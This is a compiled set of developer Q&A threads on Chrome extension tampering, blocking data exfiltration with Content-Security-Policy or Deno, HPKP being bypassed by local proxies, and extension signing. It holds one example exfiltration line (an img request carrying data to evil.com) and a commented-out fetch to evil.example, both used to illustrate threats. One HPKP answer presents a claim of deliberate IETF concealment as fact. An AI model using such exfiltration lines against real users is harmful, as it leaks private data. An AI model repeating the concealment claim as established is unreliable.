I've got a fairly popular Chrome extension. Over time I've received sporadic reports from users that the extension is malware, which of course it is not.
I've recently learned that there are malware programs that modify the files of a Chrome extension and turn it into malware.
Is there any way I can defend my extension against this kind of tampering?
Thanks.
You don't have to!
Chrome has a built-in mechanism that prevents this. Any extension installed from the Web Store includes signed hashes of all of its files.
Whenever Chrome loads the extension, those hashes are checked; if any file has been modified, Chrome marks the extension as potentially compromised, disables it, and warns the user about unauthorized changes.
That said, this only protects the static files shipped inside your extension.
If you rely on external scripts, it's your duty to protect them from man-in-the-middle attacks. Chrome's default extension CSP does a good job of securing against the worst offenders, but still: if you use dynamic code, it's your responsibility to secure it, especially if you override the CSP.
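For reference, a sketch of where such a policy lives in a Manifest V3 manifest.json (Manifest V2 uses a single string instead of the object form); the values shown are the commonly cited minimum, not necessarily the exact current defaults:

    "content_security_policy": {
      "extension_pages": "script-src 'self'; object-src 'self'"
    }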
Finally, if you're using a Native Messaging host, it is not covered by this protection. Treat it as untrusted.
Related
The background scenario is that I want to give my users a JavaScript file which they can use to analyze their sensitive private data, and I want them to feel safe that this data will not be sent out to the internet.
Initially, I thought I'd just distribute it as an .html file with an embedded <script>, and that they'd simply open this .html file in the browser over the file:/// protocol, which gives some nice same-origin policy defaults.
But this won't really offer much security to my users: a script could easily create an <img src="https://evil.com?sensitive-data=${XYZ}"> tag which would send a GET request to evil.com, despite evil.com being a different origin, because embedding images from other origins is allowed by design.
Is there some practical way to distribute my JavaScript, and/or for the end user to run such a script, so they can be reasonably sure it can't send the data over the internet?
(Unplugging the machine from the internet, installing a VM, or manipulating firewall settings are not practical.)
("Reasonably sure" = assuming that the software they use, such as the browser, follows the spec and wasn't hacked.)
Please take a look at the Content-Security-Policy subject.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/img-src
Supplementing your HTML with <meta http-equiv="Content-Security-Policy" content="img-src 'self';"> should stop the browser from making image requests to foreign origins.
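If the goal is the broader "no data leaves the machine" guarantee from the question, a stricter policy that starts from default-src 'none' may be closer to it. This is only a sketch, and it does not cover navigation-based exfiltration (e.g. setting window.location), so treat it as a mitigation rather than a guarantee:

    <meta http-equiv="Content-Security-Policy"
          content="default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'; form-action 'none'">
    <!-- Inline analysis code still runs thanks to 'unsafe-inline', while images,
         fetch/XHR, frames, fonts, etc. fall back to default-src 'none' and are blocked. -->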
An alternative approach could be to develop your project as a browser extension, where you can set up the content security policy quite precisely, including rules for inline scripting, string-to-JS execution (eval and friends), frame and font origins, and so on ( https://developer.chrome.com/docs/apps/contentSecurityPolicy/ ).
As a bonus, you (and your users) get a free-of-charge code review from the browser vendors' security teams.
Setting the browser's proxy (in its settings) to localhost:DUMMY_PORT, with nothing listening on that port, looks like a safe solution for this case.
Deno is, to cite its website:
Deno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust.
Secure by default. No file, network, or environment access, unless explicitly enabled.
So this reduces the user's trust requirement to trusting Deno (and Chocolatey, if they want to use choco install deno to install it).
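As a sketch of how that looks in practice (analyze.js is a hypothetical file name), the script is run without any permission flags, so it cannot reach the network unless the user explicitly grants it:

    // analyze.js - run with:  deno run analyze.js   (no --allow-net, --allow-read, ...)
    const input = prompt("Paste the data to analyze:") ?? "";
    console.log("Characters:", input.length);

    // Any exfiltration attempt would be refused (or would prompt the user,
    // depending on the Deno version), because network access was never granted:
    //   await fetch("https://evil.example/?d=" + encodeURIComponent(input));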
I added an HPKP header to my site, but it is not honored by Chrome or Safari. I tested it manually by setting a proxy and by going to chrome://net-internals/#hsts and looking for my domain, which was not found. The HPKP header seems correct, and I also tested it using an HPKP toolset, so I know it is valid.
I am thinking I might be doing something weird with my flow. I have a web app, which is served over myapp.example.com. On login, the app redirects the user to authserver.example.com/begin to initiate the OpenID Connect Authorization Code flow. The HPKP header is returned only from authserver.example.com/begin, and I think this might be the issue. I have includeSubDomains in the HPKP header, so I think this is not the issue.
This is the HPKP header (line breaks added for readability):
public-key-pins:max-age=864000;includeSubDomains; \
pin-sha256="bcppaSjDk7AM8C/13vyGOR+EJHDYzv9/liatMm4fLdE="; \
pin-sha256="cJjqBxF88mhfexjIArmQxvZFqWQa45p40n05C6X/rNI="; \
report-uri="https://reporturl.example"
Thanks!
I added HPKP header to my site, but it is not honored by Chrome or Safari... I tested it manually by setting a proxy...
RFC 7469, Public Key Pinning Extension for HTTP, kind of sneaks that past you. The IETF published it with overrides, so an attacker can break a known good pinset. It's mentioned once in the standard by the name "override", but the details are not provided. The IETF also failed to publish a discussion of it in a security considerations section.
More to the point, the proxy you set engaged the override. It does not matter if it's the wrong proxy, a proxy certificate installed by a mobile device OEM, or a proxy controlled by an attacker who tricked a user into installing it. The web security model and the standard allow it. They embrace interception and consider it a valid use case.
Something else they did was make the reporting of the broken pinset a MUST NOT or SHOULD NOT. It means the user agent is complicit in the cover-up, too. That's not discussed in a security considerations section, either. They really don't want folks to know their supposedly secure connection is being intercepted.
Your best bet to avoid it is to move outside the web security model. Don't use browser-based apps when security is a concern. Use a hybrid app and perform the pinning yourself. Your hybrid app can host a WebView control or view, but still get access to the channel to verify parameters. Also see OWASP's Certificate and Public Key Pinning.
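As a sketch of pinning performed outside the browser, here is the Node.js pattern of checking the server's public key hash yourself (the host name is taken from the question, and the pin value is the first pin-sha256 from the question's header, used purely for illustration):

    const https = require('https');
    const tls = require('tls');
    const crypto = require('crypto');

    // SHA-256 of the server's SubjectPublicKeyInfo, base64-encoded (same format as pin-sha256).
    const EXPECTED_PIN = 'bcppaSjDk7AM8C/13vyGOR+EJHDYzv9/liatMm4fLdE=';

    const options = {
      hostname: 'authserver.example.com',
      port: 443,
      path: '/begin',
      checkServerIdentity: (host, cert) => {
        // Keep the normal hostname check, then add the pin check on top of it.
        const err = tls.checkServerIdentity(host, cert);
        if (err) return err;
        const pin = crypto.createHash('sha256').update(cert.pubkey).digest('base64');
        if (pin !== EXPECTED_PIN) {
          return new Error('Public key pin mismatch - possible interception');
        }
      },
    };
    options.agent = new https.Agent(options);

    https.get(options, (res) => console.log('status:', res.statusCode));

A locally installed proxy CA does not bypass this check, because the comparison is against a hash you ship with the app rather than against the system trust store.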
Also see Comments on draft-ietf-websec-key-pinning on the IETF mailing list. One of the suggestions in the comments was to change the title to "Public Key Pinning Extension for HTTP with Overrides" to highlight the feature. Not surprisingly, that's not something they want. They are trying to do it surreptitiously, without user knowledge.
Here's the relevant text from RFC 7469:
2.7. Interactions with Preloaded Pin Lists
UAs MAY choose to implement additional sources of pinning
information, such as through built-in lists of pinning information.
Such UAs should allow users to override such additional sources,
including disabling them from consideration.
The effective policy for a Known Pinned Host that has both built-in
Pins and Pins from previously observed PKP header response fields is
implementation-defined.
Locally installed CAs (like those used by the proxies you say are running) override any HPKP checks.
This is necessary so as not to completely break the internet, given how prevalent they are: anti-virus software and proxies used in large corporations basically MITM HTTPS traffic through a locally issued certificate, as otherwise they could not read the traffic.
Some argue that locally installing a CA requires access to your machine, and at that point it's game over anyway; but to me this still massively reduces the protection of HPKP, and that, coupled with the high risks of using HPKP, means I am really not a fan of it.
Please tell me: if an extension was removed (taken down from the Chrome Web Store, or the account was suspended), will it finally be deleted from the Web Store after 3 months? And will it be removed from the computers of all users who previously installed it, or not?
I guess it would depend on how it was removed.
If a developer unpublishes the extension, it is not deleted from the Web Store database; existing installs will continue to exist, but no new installs will happen.
If Google catches a malicious extension, it will, in addition, be remotely disabled on users' machines. It's hard to say whether it's "deleted" from the Web Store or simply unpublished.
Those are the two extreme situations; in between there can be a whole spectrum. If an extension is delisted pending some changes, I'm not sure what happens to existing installs. Google probably explains that when it notifies the developer.
How can I sign my extension so users can be sure it is safe and won't steal their information? My extension needs to access page contents, and some users are uneasy about granting an extension permission to do so.
Can I sign my extension using a verified signing provider, for example VeriSign?
When you publish an extension to the Chrome Web Store, the only "proof" that users can have of your extension is given by the rating system and the comments of other users. A hypothetical user who wants to install your extension looks at the ratings and the comments, so make sure that your extension gets good feedback from its users.
By the way, Google doesn't always review your extension's code manually; most of the time it only performs some heuristic checks on the code. So the problem is that developers could easily include malicious code in their extension that may go unrecognized and could harm users' privacy.
Therefore, given the Chrome Web Store policy, "validating" your extension this way is not possible at all. Plus, using SSL services (like the one you mentioned) would not make any sense, since your extension's scripts are stored locally.
What you can do is:
Encourage users to rate your extension and leave good feedback if they like it.
Redirect users to help links in case of trouble (links like "having trouble?" in your popup and so on).
Write a well-worded description, and obviously add some images (or, better, videos) to clearly show why a user may find your extension useful.
Always be nice (implied, ahah).
Your extension cannot be signed by an external provider, but it is signed by the Chrome Web Store itself.
Every extension has an associated private key used for signing. It ensures a consistent extension ID and update path. You can generate one yourself by packaging the extension as a CRX (which produces a .pem file) and provide it when publishing on the CWS, or the CWS generates one internally when you publish (and then there's no way to extract it).
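For example, packing on the command line (the binary name and the paths are placeholders that vary by platform) creates the .crx plus the .pem key on the first run; reusing the key on later runs keeps the extension ID stable:

    chrome --pack-extension=/path/to/my-extension
    chrome --pack-extension=/path/to/my-extension --pack-extension-key=/path/to/my-extension.pem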
From then on, only code signed with this key (by the Web Store engine) will be recognized by Chrome as an update. Furthermore, at least on Windows, only CWS-signed packages can be installed.
This security is as strong as the developer's Google account: if it is compromised, CWS will accept an update to your extension, which will be signed with the same key.
That said, as Marco correctly pointed out in his answer, the act of signing something is just snake oil with respect to security: the signature verifies the identity of the publisher, but nothing more.
There's one more aspect - verified sites. If your extension interacts with a site you control, you can certify this by associating your extension with the site. It will be visible in the Web Store.
CWS-signed packages also carry an implicit assurance of "so far, we did not catch this extension breaking any rules". Google can pull the extension off the Web Store and, in severe cases, blacklist it and remove it from all Chrome installs. So that's an additional assurance for the user.
Google runs automated heuristic checks every time you submit your extension, which can trigger manual review. But that's invisible to the user.
That said, make sure to ask for only the absolute minimum permissions you need. For instance, look into the activeTab permission. It gives full host permissions for a tab when the extension is invoked by the user, but does not result in any permission warning. This was specifically added to address concerns about blanket extension permissions.
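A sketch of what that can look like in Manifest V3 (the file names and the pairing with the "scripting" permission are assumptions for the example, not something the answer prescribes):

    // manifest.json (fragment):
    //   "permissions": ["activeTab", "scripting"],
    //   "action": { "default_title": "Analyze this page" }

    // background.js - injects a content script only into the tab where the user
    // clicked the toolbar button; no blanket host permissions are requested.
    chrome.action.onClicked.addListener((tab) => {
      chrome.scripting.executeScript({
        target: { tabId: tab.id },
        files: ["content.js"],
      });
    });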
Is it possible to access Google Chrome's cache from within an extension?
I'd like to write an extension that loads a cached version of a page when the online one can't be accessed (e.g. Internet connectivity issue).
Updated: I know I could write an NPAPI plugin accessible through an extension to accomplish this, but I'd rather not suffer through writing one... I am after a solution without resorting to NPAPI, please.
Note: as far as I can tell, Google Chrome doesn't support this functionality (at least not out-of-the-box): I just had an episode of "no Internet access" and I was stranded...
Unfortunately, I'm 99% sure that this is impossible without using an NPAPI plugin in your extension.
Chrome extensions are sandboxed to their own process, and can only access files within the extension's folder.
There is some support for things like chrome://favicon/. But that's about it, at least for now.
Source (Google Chrome Extensions Reference)
P.S. I just had a crazy idea. Extensions only have access to files in their folder... but Chrome stores its cache in the Cache folder. What you might try is copying (or moving) the Cache folder into a subfolder within the extension. The extension should then be able to access the cache.
Whether this is enough to actually enable offline mode... I don't know. I do see some HTML files (and obviously a lot of images) within my Cache folder, though.
In fact, even without using an extension, I can open up the HTML files in Chrome. And because they're stored on your computer, you should be able to access them even without internet.
P.S. The Cache folder is stored at PATH-TO-CHROME/Default/Cache
P.P.S. There is a way to store an entire webpage and archive it for later use. Check out this extension:
https://chrome.google.com/extensions/detail/mpiodijhokgodhhofbcjdecpffjipkle
Just make a simple extension manifest with a content script that loads jQuery from a CDN, then uses it to go through all the <a> elements on the page and alter the href values to have this prefix: http://webcache.googleusercontent.com/search?q=cache:
So <a href="http://stackoverflow.com/questions/blah"> becomes:
<a href="http://webcache.googleusercontent.com/search?q=cache:http://stackoverflow.com/questions/blah">
Voilà, you are cache surfing, but you still need to be able to reach Google. I understand this answer is a bit outside the scope of the question, but it still solves a lot of web connectivity issues.
I'm tempted to just go write this plugin but I bet it'd be taboo in Google's eyes, so it'd get blocked or removed rather quickly. :)